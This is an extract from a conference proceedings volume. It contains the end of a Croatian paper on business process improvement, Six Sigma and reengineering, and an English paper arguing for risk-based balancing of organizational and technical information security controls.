4.1. POBOLJŠANJE POSLOVNIH PROCESA

Poboljšanje poslovnih procesa je proces unaprjeđivanja postojećih procesa pomoću otklanjanja gotovo svih nedostataka unutar organizacije. Alati za poboljšanje poslovnih procesa se temelje na povećanju razine kvalitete i/ili povećanju kontrole kvalitete. Neki od alata poboljšanja poslovnih procesa su metoda šest sigma (6σ) i integralni informacijski sustavi. 109 Ibidem, p. 195 110 Bosilj Vukšić V., Hernaus T., Kovačić A., op.cit., p. 207-208 111 Lončar A., „Alati za upravljanje poslovnim procesima“, online: http://www.infotrend.hr/clanak/2008/3/alati-za-upravljanje-poslovnim-procesima,15,470.html (29.4.2014.) 112 Ibidem 113 Bosilj Vukšić V., Hernaus T., Kovačić A.,op.cit., p.


133

4.1.1. Metoda šest sigma - 6σ

Za poboljšanje organizacijske razine procesa potrebno je smanjiti broj varijacija u procesu jer se time postiže bolja predvidivost procesa, smanjuju se vremenski gubici, izbjegavaju suvišne operacije, proizvodi i usluge postaju kvalitetniji, a korisnici zadovoljniji.114

Program šest sigma se može opisati kao strateška inicijativa kompanije za unaprjeđe- nje procesa sa ciljem smanjivanja troškova i povećanje prihoda, odnosno, procesna učinko-vitost. Pojam šest sigma (6σ) se temelji na statističkoj mjeri koja označuje 3,4 nedostataka na milijun pokušaja (DPMO – engl. defects per million opportunities).115 Metoda se temelji na primjeni statističkih alata i mjerenja odstupanja (standardne devijacije - σ) od srednje vrije-dnosti statističke distribucije (Gausova razdioba) neke pojave: radne operacije, aktivnosti ili procesa116, pri čemu je σ(standardno odstupanje) mjera rasipanja, te uz pretpostavku da je pro- matrani proces raspodijeljen po tzv. normalnoj raspodjeli, “šest sigma” je najuže povezana sa zahtjevom za sposobnošću procesa.

Dvije metode poboljšanja:117 • 1. DMAIC – Define Measure Analyze Improve Control (definiraj – mjeri– anali-

ziraj– poboljšaj – kontroliraj), • 2. DMADV – Define Measure Analyze Design Verify (definiraj – mjeri – anali-

ziraj – oblikuj – provjeri) Ključni procesi pri korištenju metode šest sigma su: izgradnja kadrovske infrastru-

kture, izbor projekata, praćenje poboljšanja i stvaranje pozitivnog okruženja.118 Implementacija 6 sigma:119 • 1. Odrediti prioritete za unapređenje - specificirati probleme koji utječu na kupca,

na kvalitetu i definirati jedan kao najbitniji, • 2. Odrediti sudionike tima - okupiti tim ljudi koji imaju potrebna znanja vezana

za definirati problem, te odrediti ulogu svakog člana tima, • 3. Opisati cijeli proces koji se želi unaprijediti - opisati ulazne i izlazne parametre

procesa, opisati, opremu, radnu snagu, metode rada, • 4. Analizirati sustav - odrediti točnost, preciznost, ponovljivosti instrumenata koji

se koriste za osiguranje sposobnosti, • 5. Definirati i opisati potencijalne kritične procese ili proizvode, • 6. Potvrditi kritične procese treba provjeriti i potvrditi potencijalne uzorke varija-

bilnosti procesa i potencijalne probleme, • 7. Obaviti studiju o sposobnosti procesa - definirati granice dopuštenih odstupanja

procesa te osigurati sposobnost procesa u ostvarivanju maksimalnih mogućnosti,

114 Bosilj Vukšić V., Ivančan T.,; „Primjena koncepta six sigma u kreiranju usluga mobilnih mreža treće generacije“; Tehnički vjesnik 13 (3,4) 13-19, 2006., p. 13; online: http://hrcak.srce.hr/file/13523 (15.4.2014.) 115 Bosilj Vukšić V., Hernaus T., Kovačić A., op.cit., p. 35.

116 Kalauz S., „Upravljanje kvalitetom, šest sigma metodologija“, online: http://zvu.hr/~sonjak/Predavanja/%C5%A0EST%20SIGMA.ppt (4.3.2014.)

117„Šest sigma“, online: http://strojevi.grf.unizg.hr/media/Odabrana%20poglavlja%20upravljanja%20kvalitetom/Sest%20 sigma%20201 1_12.pdf (3.3.2014.)

118 Kalauz S., op.cit. 119 Ibidem


134

• 8. Implementacija optimalnih operativnih uvjeta i metodologija kvalitete – uspo- stavlja se stalna kontrola procesa kojoj je cilj prevencija uzroka varijacija,

• 9. Nadgledati proces tokom vremena i kontinuirano nadgledati - cilj je utvrditi i dokazati unapređenje, te odrediti granice dopuštenih odstupanja procesa,

• 10. Reducirati rutinski uzrok varijacija za ostvarenje šest sigma - potrebno je smanjiti i odstraniti slučajne uzroke varijacija, jer je jedino tada moguće definirati granice procesa.

4.1.2. Integralni informacijski sustavi

Integralni informacijski sustav je informacijski sustav koji obuhvaća cijeli model poslovanja poduzeća, podržava i integrira rad svih službi i funkcija te povezuje sve poslovne procese unutar poduzeća, kao i vanjske poslovne procese kojima se poduzeće povezuje s poslovnim partnerima. Sustav rabi jedinstvenu bazu podataka i obavlja funkcije transakcijskog i menadžerskog informacijskog sustava te integrira elemente sustava za potporu odlučivanju skladište podataka, rudarenje podataka). Omogućuje praćenje svih resursa poduzeća (materijala dokumenata i izvještavanje na razini procesa, komunikaciju, suradnju i grupni rad zaposlenika te planiranje, praćenje i analizu korištenja, proizvoda, zaposlenika, strojeva i fina- ncijskih sredstava).120

Nedostaci integralnih informacijskih sustava su: visok rizik zbog velikih ulaganja, složenost sustava jer je potrebna velika razina prilagodbe poslovnih procesa, nespremnost menadžmenta u uključivanje u rad sustava, gotova programska rješenja nisu uvijek najbolji izbor za poduzeće.

Neki od integralnih informacijskih sustava jesu:121 informacijski sustav za planiranje potreba proizvodnje (engl. MRP – Manufacturing Requirements Planning), sustav za planiranje resursa poduzeća (engl. ERP – Enterprise Resource Planning), poboljšani ERP sustav koji se dodaje faktor lanca opskrbe (engl. SCM – Supply Chain Management) i sustav za upravljanje odnosima s kupcima (engl. CRM – Customer Relationship Management).

4.2. REINŽENJERING POSLOVNIH PROCESA

Reinženjering poslovnih procesa (engl. Business Process Reengineering, BPR) je organizacijski koncept sa ciljem modeliranja poslovnih procesa i rekonstruiranja poslovnog sustava kako bi se poboljšale performanse poduzeća.122 Reinženjering poslovnih procesa se uvodi ukoliko su potrebne drastične promjene u načinu poslovanja, organizacijskoj strukturi i slično.

Promjene u organizaciji za provedbu reinženjeringa poslovnih procesa:123 − Promjena organizacijske strukture od funkcijski orijentiranih odjela prema proce-

sno orijentiranim timovima, − Promjena poslova od jednostavnih prema složenijim poslovima, − Promjena uloge zaposlenika od kontroliranih prema samostalnim, − Promjena fokusa efikasnosti od aktivnosti prema rezultatima.

120 Bosilj Vukšić V., Hernaus T., Kovačić A., op.cit., p. 128. 121 Bosilj Vukšić V., Hernaus T., Kovačić A., op.cit., p. 128 122 Panian Ž. i suradnici, op.cit., p. 132 123 Ibidem, p. 133


135

Obilježja reinženjeringa:124

− Radikalne promjene, − Promjena stavova i ponašanja sukladno viziji, − Ograničen broj inicijativa.

Reinženjering poslovnih procesa je riskantan potez koji ukoliko bude uspješno proveden može dovesti do poboljšanja produktivnosti za 95 %, ali ukoliko ne uspije može dovesti u opasnost cijelo poslovanje.

Iako treba težiti optimizaciji svih poslovnih procesa u poduzeću, to ne znači da je potrebno redizajnirati svaki poslovni proces jer postoji mogućnost stvaranja procesnog pa- radoksa. Procesni paradoks označava stanje u kojemu neovisno o provedenim promjenama procesa ostaju isti rezultati ili postaju lošiji.125

Stoga se ističe potreba za definiranjem onih procesa koje treba ili ne treba mijenjati, odnosno ključnih procesa u poslovanju. Postoje razni alati za definiranje klju- čnih poslovnih procesa kao što su matrica kreiranja procesne vrijednosti za interesno – utje- cajne skupine i matrica isticanja vrijednosti. Oni funkcioniraju na način određivanja, definiranja i analiziranja interesnih skupina te elemenata koji utječu na poduzeće i njegove poslovne procese.

4.3. ODNOS I RAZLIKE IZMEĐU POBOLJŠANJA POSLOVNIH PROCESA I REINŽENJERINGA POSLOVNIH PROCESA

Sa stajališta procesnog pristupa i poslovnih procesa, povećanje organizacijske uspješnosti se postiže unaprjeđenjem postojećeg ili kreiranjem novog poslovnog procesa.

Ukoliko je poslovni proces stabilan, a žele se uvesti određene promjene, poduzeće će koristiti poboljšanje poslovnih procesa, a u slučaju da se poslovni proces mora redizajnirati na funkcionalnoj razini, koristiti će se reinženjering poslovnih procesa.

Ključna razlika između poboljšanja i reinženjeringa poslovnih procesa leži u tome što poboljšanje poslovnih procesa oslanja na rješavanje problema, a reinženjering na promjenu načina funkcioniranja poslovnog procesa. Može se reći da je poboljšanje poslovnih procesa taktički, a reinženjering strateški pojam.126

Većina organizacija bi trebala kombinirati obje metode za postizanje poslovne uspješnosti i konkurentnosti. Kombinacijom ovih metoda postiže se kontinuirano unaprjeđe- nje poslovnih procesa i inovacije u poslovnom okruženju

Radi postizanja racionalnosti poslovnih procesa stručnom timu za restrukturiranje na raspolaganju je široka lepeza mogućnosti; otklanjanje slabih mjesta, optimizacija, inovacija i reinženjering. Razlikuju se po opsegu intervencije u poslovnom procesu, što podrazumijeva i razliku u vremenu trajanja intervencije kao i veličinu rizika.127

124 Tijan E., op.cit. 125 Bosilj Vukšić V., Hernaus T., Kovačić A., op.cit., p. 80 126 Bosilj Vukšić V., Hernaus T., Kovačić A., op.cit., p. 93 127 Drljača M., Vrbanc M., „Rekonstruiranje sustava upravljanja na zračnim lukama“, pregledni članak, Zračna luka Zagreb d.o.o.; Suvremeni promet, Vol. 28, No. 3-4,Hrvatsko znanstveno društvo za promet, Zagreb, 2008, p. 181-188., online: https://bib.irb.hr/datoteka/520986.Restrukturiranje_sustava_upravljanja.pdf (22.2.2014.)


136

Shema 7: Odnos BPI i BPR

Izvor: Brumec J., „Modeliranje poslovnih procesa“, Zagreb 2011, online: http://www.slideshare.net/Brumiko/modeliranje-poslovnih-procesa-uvod-u-bpmn (10.2.2014.)

Reinženjering ili preustroj poslovnih procesa (eng. Business Process Reengineering - BPR) je povezan sa učinkovitošću poslovanja i misijom organizacije, što znači da nema alata koji pomažu pri preustroju.

Dok je poboljšanje poslovnih procesa (eng. Business Process Improvment - BPI) po- vezano s djelotvornošću samih procesa organizacije te može biti podržano suvremenom informacijskom i komunikacijskom tehnologijom.

5. ZAKLJUČAK

Poslovni procesi su bitan pokazatelj poslovanja poduzeća te optimizacija istih vodi prema poslovnoj uspješnosti. Kako su poslovni procesi neprekidni i se konstantno ponavljaju, upravljanje poslovnim procesima je jedna od stavki menadžmenta poduzeća koja je vrlo bitna za daljnji razvoj.

Pri upravljanju poslovnim procesima ne podrazumijeva se samo njihov odabir, već njihovi tokovi, poboljšanja, unaprjeđenja i kontrole kvalitete. Kontroliranje poslovnih procesa je nužno kako bi se utvrdilo da li je određenim procesima potrebno poboljšanje, a u slučaju da se većina poslovnih procesa ne odvija planiranim tokom, da li je potreban reinženjering.

Reinženjering poslovnih procesa je veoma riskantan pothvat prije kojeg treba provesti analizu interesnih skupina i odlučiti koje procese treba u potpunosti mijenjati, a koji se mogu unaprijediti. Kako bi poduzeća znala kada je trenutak za reinženjering ili poboljšanje poslovnih procesa, potreban je konstantni nadzor nad odvijanjem procesa.

Praćenje odvijanja poslovnih procesa se može ostvariti na više načina, pomoću raznih alata i programskih rješenja koji znatno olakšavaju uvid u poslovanje poduzeća. Razvo- jem tehnologije, alati za upravljanje poslovnim procesima su dostupni u velikom broju svima koji ih potražuju.


137

Kako bi se ostvarilo kvalitetno praćenje poslovnih procesa, potrebno je modeliranje istih. U modeliranje poslovnih procesa se ubrajaju simulacijske i grafičke metode modeliranja. Dok se simulacijsko modeliranje bazira na dinamičkom prikazu modela, grafičko modeliranje prikazuje statični model realnog sustava.

Modeliranjem poslovnih procesa postiže se efikasno kontroliranje kvalitete izvođenja poslovnih procesa u skladu za strategijom poslovanja poduzeća. Ukoliko je uspostavljen kvalitetan monitoring poslovnih procesa, modeliranje će osigurati dugoročno ostvarivanje profita.

Zbog svog dinamičnog prikazivanja, danas su atraktivnije simulacijske metode, stoga se u programska rješenja koja su bazirana na grafičkom modeliranju sve češće integriraju opcije sa prebacivanjem programskog jezika u izvršni jezik koji se može prikazati kao simulacija.

Jedna od najpoznatijih norma grafičkog modeliranja je BPMN 2.0 sa dodatkom izvršavanja programskog jezika.

Neovisno o odabiru metode modeliranja, nužno je poznavanje rada programskih rješenja kako bi modeliranje olakšalo poslovanje, a ne izazvalo dodatnu komplikaciju. Stoga je potreban informatički kadar koji će obavljati modeliranje u skladu sa potrebama poduzeća, što podrazumijeva dodatne investicije koje poduzeća nisu uvijek spremna provesti jer se rezultati javljaju tek nakon određenog vremena. To su investicije sa posrednim ekonomskim učincima, gdje se eksploatacija javlja nakon određenog vremena korištenja investicije.

Pored ulaganja u programske pakete i informatički kadar, potrebno je uzeti u obzir fleksibilnost i prilagodljivost kupljenog programskog rješenja. Ukoliko poduzeće želi program koji će biti prilagođen svim pogledima njegovog poslovanja, dolazi do pitanja izrade prilagođenog programskog rješenja, što može zahtijevati velike investicije. Naravno, kvalitetniji su programi rađeni „po mjeri“ upravo zato jer su rađeni samo za jedno poduzeće za one djelatnosti kojima se to poduzeće bavi.

Gotova programska rješenja mogu biti adekvatna za korištenje, ali se može dogoditi da se određene stavke u poslovanju ne podudaraju pa nastaje problem kojeg treba riješiti. Najčešće se događa da je program nefleksibilan (ne može se nadograditi) ili je cijena nado- gradnje veća od cijene samog programa, što nalaže da je bitan odabir ispravnog alata za poslovanje. Ukoliko je ulaganje opravdano, poduzeće će posjedovati kvalitetan alat za kontrolu svih poslovnih procesa, podprocesa, aktivnosti, zadatka i koraka koji se odvijaju u poslovanju.

Cilj svakog poduzeća je optimalno odvijanje procesa, stoga je potrebno konstantno praćenje i unaprjeđivanje tehnologija kako bi se zadržala konkurentnost. Stalni ekonomski rast nije moguć, stoga se treba bazirati na održivom razvoju uz pomoć prateće informatičke podrške. Modeliranjem poslovnih procesa se postiže kontinuirano praćenje tokova procesa, povećava se prihod te raste konkurentnost poduzeća što je ključno pri svakom upravljanju.


138

LITERATURA

POPIS KNJIGA

1. Bosilj Vukšić V., Hernaus T., Kovačić A.; Upravljanje poslovnim procesima – organizacijski i informacijski pristup, Školska knjiga, Zagreb 2008.

2. Panian Ž. i suradnici; Poslovni informacijski sustavi; Element , Zagreb 2010. 3. Klepac G., „Sustavi potpore odlučivanju“, Priručnik, Algebra d.o.o., Zagreb 2011.

POPIS ČASOPISA

4. Bogati J., Vuk D., „IDEF metodologija modeliranja informacijskih sustava“, Stručni rad, 5. Praktični menadžment, Vol. III, br. 4, str. 93-99; 25.12.2012. , online:

http://hrcak.srce.hr/file/142655 (4.7.2014.) 2. Bosilj 5. Vukšić V., Ivančan T.,; „Primjena koncepta six sigma u kreiranju usluga mobilnih mreža treće generacije“; Tehnički vjesnik 13 (3,4) 13-19, 2006., online: http://hrcak.srce.hr/file/13523 (15.4.2014.)

6. Drljača M., Vrbanc M., „Rekonstruiranje sustava upravljanja na zračnim lukama“, pregledni članak, Zračna luka Zagreb d.o.o.; Suvremeni promet, Vol. 28, No. 3-4, Hrvatsko znanstveno društvo za promet, Zagreb, 2008,str. 181-188., online: https://bib.irb.hr/datoteka/520986.Restrukturiranje_sustava_upravljanja.pdf (22.2.2014.)

7. Dundović Č., Poletan Jugivić T.,Kolanović I., „Implementacija informacijsko-komunikacijskih tehnologija u lukama“, Pomorski Fakultet u Rijeci, Pomorstvo, god. 19. (str 115-99), 2005, Rijeka, online: http://hrcak.srce.hr/file/6486 (6.3.2014.)

8. Ristov P., Krile S., „Programski paketi za rukovanje kontejnerima“, pregledni članak (Naše more 57 (1-2) 2010), online: http://hrcak.srce.hr/file/81659 (22.7.2014.)

9. Steenke D., Voß S., Stahlbock R.: “Container Terminal operations research – a classification and literature review”; OR Spectrum 2004, 26:3-49; online: http://www.researchgate.net/publication/225493172_Container_terminal_operation_and_operations_research_-_a_classification_and_literature_review/links/02bfe50d597b0d9016000000 (24.7.2014.)

10. Topić G.,“Modeliranje poslovnih procesa i optimizacija ljudskih resursa u složenim poslovnim sustavima“, Ericsson Nikola Tesla d.d., Zagreb, online: https://www.fer.unizg.hr/_download/repository/Gordan_Topic_klasifikacijski.pdf (17.3.2014.)

11. „Upravljanje poslovnim procesima u poduzećima Republike Hrvatske“, 2011, online: https://bib.irb.hr/datoteka/529970.UPRAVLJANJE_POSLOVNIM_PROCESIMA_U_PODUZEIMA_REPUBLIKE_HRVATSKE.doc (6.3.2014.)

POPIS OSTALIH IZVORA

12. http://public.carnet.hr/~zorkovac/informatika/algoritmi/Dijagram_toka.html (16.4.2014.) 13. http://www.croz.net/poslovno-modeliranje/ (8.2.2014.) 14. http://www.pera.net/Methodologies/ARIS/ARIS.html (1.7.2014.) 15. http://www.uml-diagrams.org/ (12.7.2014.)


139

16. „BPMN and Business Process Management; Introduction to the New Business Process Modeling Standard“; online: http://www.bpmn.org (3.4.2014.)

17. Brumec J., „Modeliranje poslovnih procesa“, Zagreb 2011, online: http://www.slideshare.net/Brumiko/modeliranje-poslovnih-procesa-uvod-u-bpmn (10.2.2014.) 18. Čerić V., „Diskretna simulacija“, Ekonomski fakultet, Zagreb, online: http://web.efzg.hr/dok/INF/Ceric/spo/(3a)_diskretna_simulacija.pdf (28.4.2014.)

19. Kalauz S., „Upravljanje kvalitetom, šest sigma metodologija“, online: http://zvu.hr/~sonjak/Predavanja/%C5%A0EST%20SIGMA.ppt (4.3.2014.) 20- Lončar A., „Alati za upravljanje poslovnim procesima“, online: http://www.infotrend.hr/clanak/2008/3/alati-za-upravljanje-poslovnim-procesima,15,470.html (29.4.2014.) Ozgun Demirag, „Integrated Definition (IDEF) Modeling Techniques“, online:

21. http://www2.isye.gatech.edu/~lfm/8851/IDEF_V4.ppt (4.7.2014.) „Simulacijsko modeliranje poslovnih procesa“, online: http://autopoiesis.foi.hr/wiki.php?name=KM%20-%20Tim%2033&parent=NULL&page=Simulacijsko%20modeliranje%20poslovnih%20procesa (20.5.2014.)

22. „Šest sigma“, online: http://strojevi.grf.unizg.hr/media/Odabrana%20poglavlja%20upravljanja%20kvalitetom/Sest%20sigma%202011_12.pdf (3.3.2014.)

23. Tijan E., Prezentacija sa predavanja – Poslovni informacijski sustavi: „Upravljanje poslovnim procesima“

24. WP 3.1 Port Processes“, online: http://efforts-project.tec-hh.net/html/Content/download/EFFORTS-WP3.1-DOC-20090605-Final-Info_brochure_Final_v2.0.pdf (7.3.2014.)

141

RISK BASED BALANCING OF ORGANIZATIONAL AND TECHNICAL CONTROLS FOR LEVERAGING

EFFECTIVENESS OF INFORMATION SECURITY

BALANSIRANJE ORGANIZACISKIH I TEHNICKIH KONTROLA NA BAZI RIZIKA ZA POSTIZANJE VECE EFEKTIVNOSTI

EZBEDNOSTI INFORMACIJA

Ms., Jasmina Trajkovski, MBA, Consultant128 Ms., Ana Meskovska, M.Sc. Consultant129

Abstract: This study elaborates the relationship between organizational and technical security controls, focusing on achieving balance between the two, which is pivotal for establishment of a successful information security management system in organizations. The main contribution of this study is in stipulating that risk-based balancing of the mix of implemented controls can leverage the effectiveness of the information security in an organization.

Key words: information security, risk based approach, risk management, organizational controls, technical controls, leveraging effectiveness of controls

Ključne reči: informaciska bezbednost, pristup baziran na rizike, upravljanje sa rizice, orga- nizaciske kontrole, tehnicke kontrole, pojacanje efikasnost kontrole

128 Trajkovski & Partners Consulting; Sv. Kliment Ohridski 24/2-1, 1000 Skopje, Macedonia; [email protected] 129 Trajkovski & Partners Consulting; Sv. Kliment Ohridski 24/2-1, 1000 Skopje, Macedonia; [email protected]

Risk based balancing of organizational and technical controls for leveraging effectiveness of information security

Zbornik radova Jasmina Trajkovski; Ana Meskovska

142

JASMINA TRAJKOVSKI, MBA, CMC, CISA, CISM, PMP

Jasmina Trajkovski is a seasoned IT governance professional with over 10 years of direct experience working with public and private sector organizations in the Balkan region. Her background in Electrical engineering and computer science was complemented with a business administration postgrad studies to enable a more balanced approach to solving the problems of the clients and helping the seize new opportunities. Since 2003, she has devoted her work in the field of information security. Working on implementation of various standards for information security, IT governance, risk management, business continuity in companies and organization in the Balkans, but as well in Africa and the Middle East, she has collected hands-on experience that is currently being used as basis for her PhD research in the field of risk management in IT-centric organizations. She currently holds several prestigious professional certificates in this field such as Certified Information Systems Auditor – CISA and Certified Information Security Manager – CISM, as well as a post-graduate certificate in Information Security from Syracuse University in USA. Jasmina is currently employed in Trajkovski & Partners Consulting, holding both the posts of a managing director and senior consultant.

1. INTRODUCTION

To be able to discuss the importance of risk-based balancing of the organizational and technical information security controls for leveraging the effectiveness of the information security management system in an organization, first the basic concept should be defined.

Information security is defined as “pre- servation of confidentiality, integrity and availability of information”, where availability is the “property of being accessible and usable upon demand by an authorized entity”, confidentiality is the “property that information is not made available or disclosed to unauthorized individuals, entities, or processes” and integrity is the “property of protecting the accuracy and completeness of assets”. [1]

There are numerous best practices and standards that give guideness for establishment and maintenance of an information security management system. Some of these standards are issued by national and international organizations such as ISO130, ANSI131, NIST132, ISA133, BSI134, for example the ISO 27000 series of standards, ISA99 series, BSI standards, SAGA etc. Others are issued by professional organizations such as ISACA, for example COBIT. Furthermore, there are numerous of European institutions and programs that operate in the area of information security, such as ENISA135 and OECD136, IDABC137 and ISA138. The various institutions and programs produce additional publications that set different kind of frameworks for information security like the OECD declaration “Towards a culture of security” and the Digital Agenda for Europe 2010-2020, just to name a few. 130 International Organization for Standardization 131 American National Standards Institute 132 National Institute of Standards and Technology 133 International Society of Automation 134 Bundesamt fur Sicherheit in der Informationstechnik 135 European Network and Information Security Agency 136 Organisation for Economic Co-operation and Development 137 Interoperable Delivery of European eGovernment Services to public Administrations, Business and Citizens 138 Interoperability Solutions for European Public Administrations



143

ANA MESKOVSKA, M.SC., CMC

Ana Meskovska works as a Consultant and Trainer in Trajkovski & Partners Consulting. Her professional development is centered on information security, actively operating in Macedonia and in the region. Her work is focused on development and establishment of various management systems (information security, quality, service management, business continuity), Knowledge Management, Manage- ment Innovations, Business Process modeling, Risk management, Project management etc. She has background in electrical engineering in electronics and telecommunications, M.Sc. in e-Business management, and M.Sc. in Manage- ment and Organizational Innovation from Queen Mary-University of London. Her academic research is centered on knowledge management strategies for stimulating management innovation, information security management for e- services and increasing trust towards e-government services. She is a Certified Management Consultant - CMC (http://www.icmci.org) and ECQA certified IT Security and e-Security Manager (http://www.ecqa.org ).Ana is a member of the Supervisory Board of IT Service Management Forum Macedonia – itSMF.

Information security organizational controls in essence are non-technical mechanisms for protecting information. In general, the information security management system represents an organizational control. Furthermore, organizational controls integrate various strategies, policies, procedures, practices, awareness raising, education, monitoring, measuring effectiveness etc. The significance of information security organizational controls lies in the intangible nature of information security threats, as well as the existing organizational vulnerabilities regarding information security. The significance of organizational controls grows as these threats are becoming more and more critical every day.

This study will examine the importance of achieving a balance between organizational and technical controls for levaraging the effectiveness of information security and how can that balance be achieved through a risk based approach.

The following section introduces the importance of the balancing information security controls. The next section presents overview of risk management and its significance for information security management. Next comes the section discussing the risk based balancing of organizational and technical controls for enhanced information security. The final section is the conclusion where the main points and arguments of this study are summarized.

2. IMPORTANCE OF BALANCING INFORMATION SECURITY

CONTROLS

Numerous research and surveys identify people as the biggest vulnerability of organi-

zations regarding information security, mainly focusing on careless employees and malicious insiders. [2], [3], [4], [5], [6]

Insider threat represents the potentially damaging act that can be realized by a trusted insider. “The insider threat is manifested when human behavior departs from compliance with established policies, regardless of whether it results from malice or a disregard for security policies.” Insider is an individual who is employed in the organization or at some point had access to organization’s information and information systems, for example a contractor or a past employee. [4] Typically, outsiders are major perpetrator of cybercrime, nevertheless attacks from insiders usually cause more harm and have bigger financial impact.[2]



144

“The most challenging attacks exploit human vulnerabilities rather than technological ones, which are easier to remediate.” [7] This leads us to understanding that people represent the weakest link in the information security management system. Having this in mind, it is apparent that in order for organizations to effectively manage information security they must use appropriate mechanisams for handling their employees. For these purposes, in the process of managing information security organizations should have appropriate organizational controls in place to be able to deal with people, insiders, as well as outsiders.

Implementation of effective information security controls begins with establishment of organizational strategies for dealing with the most critical threats for information security. The international standard ISO 27001 defines threat as “potential cause of an unwanted incident, which may result in harm to a system or organization”. [1] Protecting vital organizational assets requires effective use of technology and education and awareness of the users, as well as “building a security culture in which everyone can recognize and evaluate the risks”. [8] Most regulations, international standards and best practices for information security include education of people as one of the compulsory controls that should be implemented by organizations.

Having only technical controls for information security it not an effective approach, no matter how sophisticated and costly are the technical solutions. Having only organizational security controls cannot be effective as well. To be able to establish an effective information security management system, appropriate balance between the organizational and technical controls should be achieved. The most effective way for accomplish this balance is the risk based approach.

3. RISK BASED APPROACH FOR INFORMATION SECURITY

More effective approach for dealing with information security threats is the risk based approach. [2] However the goal should be mitigation of the risk, not its elimination, because perfect security cannot be achieved. [8] In numerous organizations information security represents a technological issue and the management does not relate threats to the business outcomes and does not recognize the business implications of information security risks. That is one of the reasons why the approach for addressing security risks should be reversed, meaning that instead of focusing on technical vulnerabilities, the organizations should be focusing on protecting the most critical processes and assets.

The main concepts of risks management can be divided into 2 groups: − definition of risk, types of risks and risk management, and − (ii) risk management frameworks and standards. [9] Based on the International standard for Risk Management – ISO31000, risk is defined

as: “effect of uncertainty on objectives”, where the uncertainties include events (which may or not happen) and uncertainties caused by ambiguity or a lack of information, while the objectives can have different aspects (health and safety, financial, IT, environmental) and can apply at different levels (such as strategic, organizational, project, process). [10] It also includes both negative and positive impacts on objectives. The risk is often expressed as a combination of the consequences of an event and the associated likelihood of occurrence.

In order to achieve continual operations in organizations, different types of risks should not be approached independently, instead an integrated approach is necessary. This approach should be focused on the main drivers in the organization, such as continual operations based on continuity of IT operation and other business processes.



145

Information security risk represents the risk associated with the operation and use of information systems that support the missions and business functions of their organizations. [11] ISO31000 defines the risk management very broadly as the coordinated activities to direct and control an organization with regards to risk. [10]

Risk management is carried out as a holistic, organization-wide activity that addresses risk from the strategic level to the tactical level, ensuring that risk based decision making is integrated into every aspect of the organization. Nowadays, there are several types of risk management methodologies, some of them issued by national and international organizations and others issued by professional organizations. The common goal of these methods is to enable organizations to conduct risk assessment exercises and then effectively manage the risks by minimizing them to an acceptable level. [12]

4. RISK BASED BALANCING OF ORGANIZATIONAL AND TECHNICAL CONTROLS FOR ENHANCED

INFORMATION SECURITY

The results from the risk assessment, achieved by consensus of the various management representatives, bring forward different impacts of the information security risks. These identified impacts can be mitigated or treated with technical controls such as access control devises, intrusion detection systems, backups, anti-malicious software, firewalls, etc. Based on the authors’ experiences gained from implementing risk management in over 20 IT-centric organizations in the Balkan region, it has been concluded that these controls, although efficient in their own right, do not reduce the risk as initially expected. This underperformance has been contributed to the human factor that utilizes these tools and the organizational setting in which they are implemented.

On the other hand, the same identified risk impacts can be mitigated with organizational controls, such as policy on information classification, information labeling, restriction of access rights on a very strict organizational basis, segregation of networks, decision on limita- tion of access to internet i.e. isolation of systems, etc. Based on the authors’ experiences, it has been concluded that these controls, although efficient in their own right, do not reduce the risk as initially expected, as well. This underperformance has been contributed to the extensive penetration of modern technologies in the everyday life, integration of work-based and personal systems, and the inapplicability of system isolation i.e. total prohibition of internet access to organizational system. In other words, usage of social media and networking tools for organizational communications, access to organizational systems via personal devices,etc.

Based on these underperformances of each of these two forms of controls, it can be concluded that a balance of the two would provide more adequate risk reduction. An example from authors’ experience show that for effective access control in a medium sized company the following mix of organizational and technical controls can provide 90% decrease of the risk of unauthorized access to critical information. Setting appropriate levels of information classification and access control policy based on the defined levels, as well as defining the access right of all employees in a corresponding access rights matrix as organizational controls combined with technical controls, such as implementation of authentication thru user name and password for users handling information classified on level public and internal, and additional authentication thru use of digital certificate for users who process confidential and personal data.



146

5. CONCLUSION

Establishing effective information security management system in an organization presents a significant and complex challenge. This paper examined the complementarity between the organizational and technical information security controls and the significance of risk management for information security. At the end the authors stressed the significance of achieving appropriate balance between the organizational and technical controls in order to establish an effective system for managing information security, pointing out that the best way to achieve this balance is through risk management.

Further research is necessary in defining a model for adequate evaluation of the expected risk reduction with the implementation of the organizational and technical controls, and the mix of the two.



147

REFERENCES

[1] International Organization for Standardization - ISO. (2009). ISO/IEC 27000 Information technology - Security techniques -Information security management systems – Overview and vocabulary. p. 19

[2] CSO magazine; U.S. Secret Service; Software Engineering Institute CERT Program at Carnegie Mellon University; Deloitte, 2010 Cyber security watch survey: cybercrime increasing faster than some company defenses, (2010). Available from: http://www.sei.cmu.edu/newsitems/cyber_sec_watch_2010_release.cfm

[3] CSO magazine; U.S. Secret Service; Software Engineering Institute CERT Program at Carnegie Mellon University; Deloitte, 2013 US State of Cybercrime Survey: How Bad is the Insider Threat? , (2013). Available from: www.cert.org/archive/pdf/Cyber securitySurvey2013.pdf

4] Frank L. Greitzer, Andrew P. Moore, Dawn M. Cappelli, Dee H. Andrews, Lynn A. Carroll, Thomas D. Hull, (2008) Combating the Insider Cyber Threat, IEEE Security & Privacy, vol. 6, no. 1, pp. 61-64.

[5] Top 10 information security threats for 2010 [Internet]. Perimeter E-Security (January 2010). Available from: http://www.net-security.org/secworld.php?id=8709

[6] CSO magazine; U.S. Secret Service; Software Engineering Institute CERT Program at Carnegie Mellon University; Deloitte, 2004 E-CrimeWatch Survey Summary of Findings, (2004). Available from: https://www.cert.org/archive/pdf/2004eCrimeWatchSummary.pdf

[7] Kaplan,J.; Sharma,S.; Weinberg, A., Meeting the cyber security challenge, McKinsey Quarterly, (June 2011). Available from: http://www.mckinsey.com/insights/business_technology/meeting_the_cyber security_challenge

[8] Johnson, M.E.; Goetz, E.; Pfleeger, S.L., (2009) Security through Information Risk Management, Security & Privacy, IEEE , vol.7, no.3, pp.45-52.

[9] Gerber, M., & von Solms, R., (2005) Management of risk in the information age. Computers & Security, vol.24, no.1, pp.16-30.

[10] International Organization for Standardization - ISO (2009) ISO 31000:2009 - Risk Management - Principles and guidelines. p.24.

[11] NIST. Managing Information Security Risk, SP800-39 NIST Special publication. (2011). [12] Saleh, M. S., & Alfantookh, A. (2011) A new comprehensive framework for enterprise information

security risk management. Applied Computing and Informatics, vol.9, no.2, pp.107-118.